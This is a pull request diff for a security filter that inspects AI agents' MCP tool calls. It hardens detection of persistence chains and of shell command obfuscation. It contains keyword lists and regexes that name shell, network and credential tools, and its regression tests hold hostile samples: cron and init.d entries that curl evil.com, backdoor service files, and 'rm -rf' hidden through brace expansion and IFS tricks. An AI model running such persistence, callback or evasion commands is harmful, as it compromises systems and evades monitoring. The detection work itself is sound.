### PR TITLE
fix: harden chain detection and shell obfuscation coverage

### DIFF
--- a/internal/mcp/chains/classify.go
+++ b/internal/mcp/chains/classify.go
@@ -17,22 +17,25 @@ import (
 // categoryKeywords maps tool categories to keywords that appear in tool names.
 // Used as fallback classification when no config override matches.
 var categoryKeywords = map[string][]string{
-	"read":    {"read", "get", "view", "cat", "head", "tail", "open", "load", "retrieve", "access"},
-	"write":   {"write", "create", "save", "update", "edit", "modify", "put", "append", "insert"},
-	"exec":    {"shell", "bash", "run", "execute", "cmd", "spawn", "eval", "sh", "zsh", "powershell"},
-	"network": {"fetch", "curl", "wget", "http", "request", "send", "post", "upload", "download", "api"},
-	"list":    {"list", "ls", "dir", "find", "glob", "search", "scan", "enumerate", "walk"},
-	"env":     {"env", "environ", "getenv", "secret", "credential", "config", "token", "key", "password"},
-	"persist": {"crontab", "cron", "systemctl", "systemd", "launchd", "launchctl", "autostart"},
+	"read":          {"read", "get", "view", "cat", "head", "tail", "open", "load", "retrieve", "access"},
+	"write":         {"write", "create", "save", "update", "edit", "modify", "put", "append", "insert"},
+	"exec":          {"shell", "bash", "run", "execute", "cmd", "spawn", "eval", "sh", "zsh", "powershell"},
+	"network":       {"fetch", "curl", "wget", "http", "request", "send", "post", "upload", "download", "api"},
+	"list":          {"list", "ls", "dir", "find", "glob", "search", "scan", "enumerate", "walk"},
+	"env":           {"env", "environ", "getenv", "secret", "credential", "config", "token", "key", "password"},
+	categoryPersist: {"crontab", "cron", "systemctl", "systemd", "launchd", "launchctl", "autostart"},
 }
 
 // categoryUnknown is returned when a tool name does not match any category.
 const categoryUnknown = "unknown"
 
+// categoryPersist is the classification for persistence operations.
+const categoryPersist = "persist"
+
 // categoryPriority defines the priority order for keyword matching.
 // Higher priority categories win when a tool name matches multiple categories.
 // exec > persist > env > network > write > read > list.
-var categoryPriority = []string{"exec", "persist", "env", "network", "write", "read", "list"}
+var categoryPriority = []string{"exec", categoryPersist, "env", "network", "write", "read", "list"}
 
 // toolNameDelimiters defines characters used to split tool names into segments.
 var toolNameDelimiters = "_-."
@@ -139,7 +142,7 @@ func matchByPriority(segments []string) string {
 			lower := strings.ToLower(seg)
 			for _, kw := range keywords {
 				if lower == kw {
-					if category == "persist" && hasReadIndicator(segments) {
+					if category == categoryPersist && hasReadIndicator(segments) {
 						break // skip persist, try lower-priority categories
 					}
 					return category
@@ -163,15 +166,33 @@ var persistArgPattern = regexp.MustCompile(
 	`(?i)(\bcrontab\s+(-\w+\s+\S+\s+)*-e\b|\bcrontab\s+(-\w+\s+\S+\s+)*[^-\s]|\|\s*crontab\b|\bsystemctl\s+(-{1,2}\w+\s+)*(enable|daemon-reload)\b|\blaunchctl\s+(load|enable)\b)`,
 )
 
-// reclassifyByArgs upgrades an "exec" classification to "persist" when
-// the tool's arguments indicate a persistence command. This lets chain
-// detection catch write → bash("systemctl enable") as write-persist.
+// persistWritePathPattern matches persistence-related file paths in tool
+// arguments. Used to reclassify "write" tools as "persist" when arguments
+// target crontab, systemd unit, or launchd plist paths. Safe for "write"
+// category because write + persist-path = persistence by definition.
+// NOT used for "exec" category (those use persistArgPattern instead)
+// because "exec" + path could be read-only (e.g., "cat /etc/cron.d/backup").
+var persistWritePathPattern = regexp.MustCompile(
+	`(?i)(/var/spool/cron|/etc/cron\b|/etc/cron\.d/|/etc/crontab\b|/etc/systemd/|/lib/systemd/|\.config/systemd/user/|/etc/init\.d/|/Library/LaunchDaemons/|/Library/LaunchAgents/|~/Library/LaunchAgents/)`,
+)
+
+// reclassifyByArgs upgrades tool classification to "persist" when
+// the tool's arguments indicate persistence activity:
+//   - "exec" tools: matches explicit commands (crontab -e, systemctl enable)
+//   - "write" tools: matches persistence file paths (crontab, systemd, launchd)
 func reclassifyByArgs(category, argHint string) string {
-	if category != "exec" || argHint == "" {
+	if argHint == "" {
 		return category
 	}
-	if persistArgPattern.MatchString(argHint) {
-		return "persist"
+	switch category {
+	case "exec":
+		if persistArgPattern.MatchString(argHint) {
+			return categoryPersist
+		}
+	case "write":
+		if persistWritePathPattern.MatchString(argHint) {
+			return categoryPersist
+		}
 	}
 	return category
 }

--- a/internal/mcp/chains/matcher_test.go
+++ b/internal/mcp/chains/matcher_test.go
@@ -890,3 +890,142 @@ func TestMatcher_ReadOnlyLaunchctlNoFalseCallback(t *testing.T) {
 		t.Error("launchctl_list -> curl should not trigger persist-callback")
 	}
 }
+
+// --- Gauntlet regression tests ---
+
+func TestMatcher_GauntletEnvThenNetwork(t *testing.T) {
+	cfg := &config.ToolChainDetection{
+		Enabled:       true,
+		Action:        config.ActionBlock,
+		WindowSize:    20,
+		WindowSeconds: 60,
+		MaxGap:        intPtr(3),
+	}
+	m := New(cfg)
+
+	// Gauntlet case mcp-chain-env-network-002:
+	// get_env (env category) → fetch (network category)
+	m.Record("default", "get_env")
+	v := m.Record("default", "fetch")
+	if !v.Matched {
+		t.Fatal("expected env-then-network match for get_env → fetch")
+	}
+	if v.PatternName != "env-then-network" {
+		t.Errorf("expected env-then-network, got %q", v.PatternName)
+	}
+}
+
+func TestMatcher_GauntletWriteExecute(t *testing.T) {
+	cfg := &config.ToolChainDetection{
+		Enabled:       true,
+		Action:        config.ActionBlock,
+		WindowSize:    20,
+		WindowSeconds: 60,
+		MaxGap:        intPtr(3),
+	}
+	m := New(cfg)
+
+	// Gauntlet case mcp-chain-write-execute-003:
+	// write_file (write category) → run_command (exec category)
+	m.Record("default", "write_file")
+	v := m.Record("default", "run_command")
+	if !v.Matched {
+		t.Fatal("expected write-execute match for write_file → run_command")
+	}
+	if v.PatternName != "write-execute" {
+		t.Errorf("expected write-execute, got %q", v.PatternName)
+	}
+}
+
+func TestMatcher_GauntletPersistCallback(t *testing.T) {
+	cfg := &config.ToolChainDetection{
+		Enabled:       true,
+		Action:        config.ActionBlock,
+		WindowSize:    20,
+		WindowSeconds: 60,
+		MaxGap:        intPtr(3),
+	}
+	m := New(cfg)
+
+	// Gauntlet case mcp-chain-persist-callback-006:
+	// write_file to crontab path (reclassified write → persist) → fetch (network)
+	cronArgs := `{"path":"/var/spool/cron/crontabs/user","content":"*/5 * * * * curl evil.com"}`
+	m.Record("default", "write_file", cronArgs)
+	v := m.Record("default", "fetch")
+	if !v.Matched {
+		t.Fatal("expected persist-callback match for write_file(crontab) → fetch")
+	}
+	if v.PatternName != patPersistCB {
+		t.Errorf("expected persist-callback, got %q", v.PatternName)
+	}
+}
+
+func TestMatcher_WriteFileToCronPath_ClassifiesAsPersist(t *testing.T) {
+	cfg := &config.ToolChainDetection{
+		Enabled:       true,
+		Action:        config.ActionBlock,
+		WindowSize:    20,
+		WindowSeconds: 60,
+	}
+	m := New(cfg)
+
+	// write_file to /etc/cron.d/ should also classify as persist.
+	cronArgs := `{"path":"/etc/cron.d/backdoor","content":"* * * * * evil"}`
+	m.Record("default", "write_file", cronArgs)
+	v := m.Record("default", "fetch")
+	if !v.Matched || v.PatternName != patPersistCB {
+		t.Errorf("expected persist-callback for write to /etc/cron.d/, got matched=%v pattern=%q", v.Matched, v.PatternName)
+	}
+}
+
+func TestMatcher_WriteFileToSystemdUserPath_ClassifiesAsPersist(t *testing.T) {
+	cfg := &config.ToolChainDetection{
+		Enabled:       true,
+		Action:        config.ActionBlock,
+		WindowSize:    20,
+		WindowSeconds: 60,
+	}
+	m := New(cfg)
+
+	args := `{"path":"~/.config/systemd/user/backdoor.service","content":"[Service]\nExecStart=/bin/evil"}`
+	m.Record("default", "write_file", args)
+	v := m.Record("default", "fetch")
+	if !v.Matched || v.PatternName != patPersistCB {
+		t.Errorf("expected persist-callback for write to ~/.config/systemd/user/, got matched=%v pattern=%q", v.Matched, v.PatternName)
+	}
+}
+
+func TestMatcher_WriteFileToInitD_ClassifiesAsPersist(t *testing.T) {
+	cfg := &config.ToolChainDetection{
+		Enabled:       true,
+		Action:        config.ActionBlock,
+		WindowSize:    20,
+		WindowSeconds: 60,
+	}
+	m := New(cfg)
+
+	args := `{"path":"/etc/init.d/backdoor","content":"#!/bin/sh\ncurl evil.com"}`
+	m.Record("default", "write_file", args)
+	v := m.Record("default", "fetch")
+	if !v.Matched || v.PatternName != patPersistCB {
+		t.Errorf("expected persist-callback for write to /etc/init.d/, got matched=%v pattern=%q", v.Matched, v.PatternName)
+	}
+}
+
+func TestMatcher_WriteFileNonPersistPath_StaysWrite(t *testing.T) {
+	cfg := &config.ToolChainDetection{
+		Enabled:       true,
+		Action:        config.ActionBlock,
+		WindowSize:    20,
+		WindowSeconds: 60,
+	}
+	m := New(cfg)
+
+	// write_file to /tmp/ should stay as "write", not reclassify to "persist".
+	tmpArgs := `{"path":"/tmp/notes.txt","content":"hello"}`
+	m.Record("s-fp", "write_file", tmpArgs)
+	v := m.Record("s-fp", "fetch")
+	if v.Matched && v.PatternName == patPersistCB {
+		t.Error("write to /tmp/ should not trigger persist-callback")
+	}
+}

--- a/internal/mcp/policy/policy.go
+++ b/internal/mcp/policy/policy.go
@@ -81,13 +81,17 @@ var backtickCmdSubRe = regexp.MustCompile("`\\s*(?:echo|printf)\\s+(?:['\"]?%\\S
 
 // simpleAssignRe matches shell variable assignment followed by separator.
 // "x=rm;$x -rf" hides the command name in a variable.
-var simpleAssignRe = regexp.MustCompile(`(\w+)=(\w+)\s*[;&|]`)
+// Value group captures non-whitespace/non-separator chars to handle IFS
+// manipulation: "IFS=,;CMD=r,m;$CMD" assigns `,` and `r,m` respectively.
+var simpleAssignRe = regexp.MustCompile(`(\w+)=([^\s;&|]+)\s*[;&|]`)
 
 // braceExpansionRe matches bash brace expansion used to construct commands.
 // {rm,-rf,/tmp} expands to "rm -rf /tmp" at runtime. Requires at least two
-// comma-separated items containing shell-safe characters to avoid false
-// positives on JSON or other brace-delimited syntax.
-var braceExpansionRe = regexp.MustCompile(`\{([\w./:~@=*?+-]+(?:,[\w./:~@=*?+-]+)+)\}`)
+// comma-separated items. Items may be empty to catch evasion patterns like
+// {rm,} (trailing empty) and {,rm} (leading empty), both of which bash
+// expands to include "rm". At least one item must contain a shell-safe
+// character to avoid false positives on JSON or other brace-delimited syntax.
+var braceExpansionRe = regexp.MustCompile(`\{([\w./:~@=*?+-]*(?:,[\w./:~@=*?+-]*)+)\}`)
 
 // shellQuoteStripper removes shell quoting artifacts left over from ANSI-C
 // quoting (e.g. $'\x6d' framing). After decodeShellEscapes, r$'\x6d' becomes
@@ -563,10 +567,32 @@ func resolveShellConstruction(s string) string {
 		prev := s
 		s = simpleCmdSubRe.ReplaceAllString(s, "$1")
 		matches := simpleAssignRe.FindAllStringSubmatch(s, 10)
+
+		// Detect IFS reassignment: IFS=<char> sets the field separator.
+		// When IFS is non-default, variable expansions should split on
+		// the IFS char. We apply this by replacing the IFS char with
+		// space in expanded values (over-approximation, safe for detection).
+		ifsChar := ""
 		for _, m := range matches {
+			if m[1] == "IFS" && len(m[2]) == 1 {
+				ifsChar = m[2]
+			}
+		}
+
+		for _, m := range matches {
+			value := m[2]
+			// Apply IFS-aware concatenation: remove the IFS char from
+			// expanded values so "CMD=r,m" with IFS="," expands $CMD
+			// to "rm". In bash, unquoted $CMD would word-split into
+			// separate tokens, but the attacker's intent is command
+			// construction. Concatenation is the safe over-approximation
+			// for detection (reveals the assembled command name).
+			if ifsChar != "" && m[1] != "IFS" {
+				value = strings.ReplaceAll(value, ifsChar, "")
+			}
 			// Direct expansion: ${var} and $var → value.
-			s = strings.ReplaceAll(s, "${"+m[1]+"}", m[2])
-			s = strings.ReplaceAll(s, "$"+m[1], m[2])
+			s = strings.ReplaceAll(s, "${"+m[1]+"}", value)
+			s = strings.ReplaceAll(s, "$"+m[1], value)
 			// Indirect expansion: ${!var...} → ${value...}.
 			// In bash, ${!v} expands the variable whose name is v's value.
 			// Replacing the prefix ${!varname with ${value converts e.g.

--- a/internal/mcp/policy/policy_test.go
+++ b/internal/mcp/policy/policy_test.go
@@ -3109,3 +3109,41 @@ func TestValidate_InvalidArgKey(t *testing.T) {
 		t.Error("expected validation error for invalid arg_key regex")
 	}
 }
+
+// --- Gauntlet regression tests ---
+
+func TestCheckToolCall_GauntletBraceExpansionTrailingEmpty(t *testing.T) {
+	t.Parallel()
+	pc := defaultConfig(t)
+
+	// Gauntlet case shell-brace-expansion-004:
+	// /bin/{rm,} expands to /bin/rm + /bin/ (trailing empty item)
+	v := pc.CheckToolCall("exec", []string{"/bin/{rm,} -rf /tmp/sensitive"})
+	if !v.Matched {
+		t.Error("brace expansion with trailing empty item not detected: /bin/{rm,}")
+	}
+}
+
+func TestCheckToolCall_BraceExpansionLeadingEmpty(t *testing.T) {
+	t.Parallel()
+	pc := defaultConfig(t)
+
+	// {,rm} — leading empty item, bash expands to "" + "rm"
+	v := pc.CheckToolCall("exec", []string{"/bin/{,rm} -rf /tmp/sensitive"})
+	if !v.Matched {
+		t.Error("brace expansion with leading empty item not detected: /bin/{,rm}")
+	}
+}
+
+func TestCheckToolCall_GauntletIFSManipulation(t *testing.T) {
+	t.Parallel()
+	pc := defaultConfig(t)
+
+	// Gauntlet case shell-ifs-manipulation-006:
+	// IFS=,;CMD=r,m;$CMD -rf /data
+	// After IFS-aware expansion: CMD expands to "r m", producing "rm -rf /data"
+	v := pc.CheckToolCall("exec", []string{"IFS=,;CMD=r,m;$CMD -rf /data"})
+	if !v.Matched {
+		t.Error("IFS manipulation command construction not detected")
+	}
+}


### PR DESCRIPTION
## Summary

- Extend write-to-persist reclassification so `write_file` to crontab, systemd, init.d, and launchd paths triggers persist-callback and write-persist chain patterns.
- Fix brace expansion regex to handle empty leading and trailing items (`{rm,}` and `{,rm}`).
- Add IFS-aware variable resolution: `IFS=,;CMD=r,m;$CMD` now resolves to `rm`.
- Extract `categoryPersist` constant (goconst).

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
  * Improved detection of persistence-related file operations in tool calls.
  * Enhanced shell-construction analysis to better identify IFS manipulation and brace-expansion command evasion techniques.

* **Tests**
  * Added regression tests for chain pattern matching and policy enforcement validation.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->